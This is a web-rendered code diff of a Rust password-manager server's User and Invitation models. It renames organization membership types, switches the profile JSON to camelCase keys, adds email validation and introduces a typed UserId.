|
||||||
use crate::error::MapResult;
|
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
impl User {
|
impl User {
|
||||||
pub async fn to_json(&self, conn: &mut DbConn) -> Value {
|
pub async fn to_json(&self, conn: &mut DbConn) -> Value {
|
||||||
let mut orgs_json = Vec::new();
|
let mut orgs_json = Vec::new();
|
||||||
for c in UserOrganization::find_confirmed_by_user(&self.uuid, conn).await {
|
for c in Membership::find_confirmed_by_user(&self.uuid, conn).await {
|
||||||
orgs_json.push(c.to_json(conn).await);
|
orgs_json.push(c.to_json(conn).await);
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -240,30 +242,32 @@ impl User {
|
|||||||
};
|
};
|
||||||
|
|
||||||
json!({
|
json!({
|
||||||
"_Status": status as i32,
|
"_status": status as i32,
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"Email": self.email,
|
"email": self.email,
|
||||||
"EmailVerified": !CONFIG.mail_enabled() || self.verified_at.is_some(),
|
"emailVerified": !CONFIG.mail_enabled() || self.verified_at.is_some(),
|
||||||
"Premium": true,
|
"premium": true,
|
||||||
"MasterPasswordHint": self.password_hint,
|
"premiumFromOrganization": false,
|
||||||
"Culture": "en-US",
|
"culture": "en-US",
|
||||||
"TwoFactorEnabled": twofactor_enabled,
|
"twoFactorEnabled": twofactor_enabled,
|
||||||
"Key": self.akey,
|
"key": self.akey,
|
||||||
"PrivateKey": self.private_key,
|
"privateKey": self.private_key,
|
||||||
"SecurityStamp": self.security_stamp,
|
"securityStamp": self.security_stamp,
|
||||||
"Organizations": orgs_json,
|
"organizations": orgs_json,
|
||||||
"Providers": [],
|
"providers": [],
|
||||||
"ProviderOrganizations": [],
|
"providerOrganizations": [],
|
||||||
"ForcePasswordReset": false,
|
"forcePasswordReset": false,
|
||||||
"AvatarColor": self.avatar_color,
|
"avatarColor": self.avatar_color,
|
||||||
"Object": "profile",
|
"usesKeyConnector": false,
|
||||||
|
"creationDate": format_date(&self.created_at),
|
||||||
|
"object": "profile",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn save(&mut self, conn: &mut DbConn) -> EmptyResult {
|
pub async fn save(&mut self, conn: &mut DbConn) -> EmptyResult {
|
||||||
if self.email.trim().is_empty() {
|
if !crate::util::is_valid_email(&self.email) {
|
||||||
err!("User email can't be empty")
|
err!(format!("User email {} is not a valid email address", self.email))
|
||||||
}
|
}
|
||||||
|
|
||||||
self.updated_at = Utc::now().naive_utc();
|
self.updated_at = Utc::now().naive_utc();
|
||||||
@@ -300,18 +304,18 @@ impl User {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete(self, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete(self, conn: &mut DbConn) -> EmptyResult {
|
||||||
for user_org in UserOrganization::find_confirmed_by_user(&self.uuid, conn).await {
|
for member in Membership::find_confirmed_by_user(&self.uuid, conn).await {
|
||||||
if user_org.atype == UserOrgType::Owner
|
if member.atype == MembershipType::Owner
|
||||||
&& UserOrganization::count_confirmed_by_org_and_type(&user_org.org_uuid, UserOrgType::Owner, conn).await
|
&& Membership::count_confirmed_by_org_and_type(&member.org_uuid, MembershipType::Owner, conn).await <= 1
|
||||||
<= 1
|
|
||||||
{
|
{
|
||||||
err!("Can't delete last owner")
|
err!("Can't delete last owner")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
Send::delete_all_by_user(&self.uuid, conn).await?;
|
super::Send::delete_all_by_user(&self.uuid, conn).await?;
|
||||||
EmergencyAccess::delete_all_by_user(&self.uuid, conn).await?;
|
EmergencyAccess::delete_all_by_user(&self.uuid, conn).await?;
|
||||||
UserOrganization::delete_all_by_user(&self.uuid, conn).await?;
|
EmergencyAccess::delete_all_by_grantee_email(&self.email, conn).await?;
|
||||||
|
Membership::delete_all_by_user(&self.uuid, conn).await?;
|
||||||
Cipher::delete_all_by_user(&self.uuid, conn).await?;
|
Cipher::delete_all_by_user(&self.uuid, conn).await?;
|
||||||
Favorite::delete_all_by_user(&self.uuid, conn).await?;
|
Favorite::delete_all_by_user(&self.uuid, conn).await?;
|
||||||
Folder::delete_all_by_user(&self.uuid, conn).await?;
|
Folder::delete_all_by_user(&self.uuid, conn).await?;
|
||||||
@@ -327,9 +331,9 @@ impl User {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn update_uuid_revision(uuid: &str, conn: &mut DbConn) {
|
pub async fn update_uuid_revision(uuid: &UserId, conn: &mut DbConn) {
|
||||||
if let Err(e) = Self::_update_revision(uuid, &Utc::now().naive_utc(), conn).await {
|
if let Err(e) = Self::_update_revision(uuid, &Utc::now().naive_utc(), conn).await {
|
||||||
warn!("Failed to update revision for {}: {:#?}", uuid, e);
|
warn!("Failed to update revision for {uuid}: {e:#?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -337,7 +341,7 @@ impl User {
|
|||||||
let updated_at = Utc::now().naive_utc();
|
let updated_at = Utc::now().naive_utc();
|
||||||
|
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
crate::util::retry(|| {
|
retry(|| {
|
||||||
diesel::update(users::table)
|
diesel::update(users::table)
|
||||||
.set(users::updated_at.eq(updated_at))
|
.set(users::updated_at.eq(updated_at))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -352,9 +356,9 @@ impl User {
|
|||||||
Self::_update_revision(&self.uuid, &self.updated_at, conn).await
|
Self::_update_revision(&self.uuid, &self.updated_at, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn _update_revision(uuid: &str, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
|
async fn _update_revision(uuid: &UserId, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
crate::util::retry(|| {
|
retry(|| {
|
||||||
diesel::update(users::table.filter(users::uuid.eq(uuid)))
|
diesel::update(users::table.filter(users::uuid.eq(uuid)))
|
||||||
.set(users::updated_at.eq(date))
|
.set(users::updated_at.eq(date))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -374,7 +378,7 @@ impl User {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid(uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
users::table.filter(users::uuid.eq(uuid)).first::<UserDb>(conn).ok().from_db()
|
users::table.filter(users::uuid.eq(uuid)).first::<UserDb>(conn).ok().from_db()
|
||||||
}}
|
}}
|
||||||
@@ -403,8 +407,8 @@ impl Invitation {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn save(&self, conn: &mut DbConn) -> EmptyResult {
|
pub async fn save(&self, conn: &mut DbConn) -> EmptyResult {
|
||||||
if self.email.trim().is_empty() {
|
if !crate::util::is_valid_email(&self.email) {
|
||||||
err!("Invitation email can't be empty")
|
err!(format!("Invitation email {} is not a valid email address", self.email))
|
||||||
}
|
}
|
||||||
|
|
||||||
db_run! {conn:
|
db_run! {conn:
|
||||||
@@ -453,3 +457,23 @@ impl Invitation {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
DieselNewType,
|
||||||
|
FromForm,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Hash,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
#[deref(forward)]
|
||||||
|
#[from(forward)]
|
||||||
|
pub struct UserId(String);
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user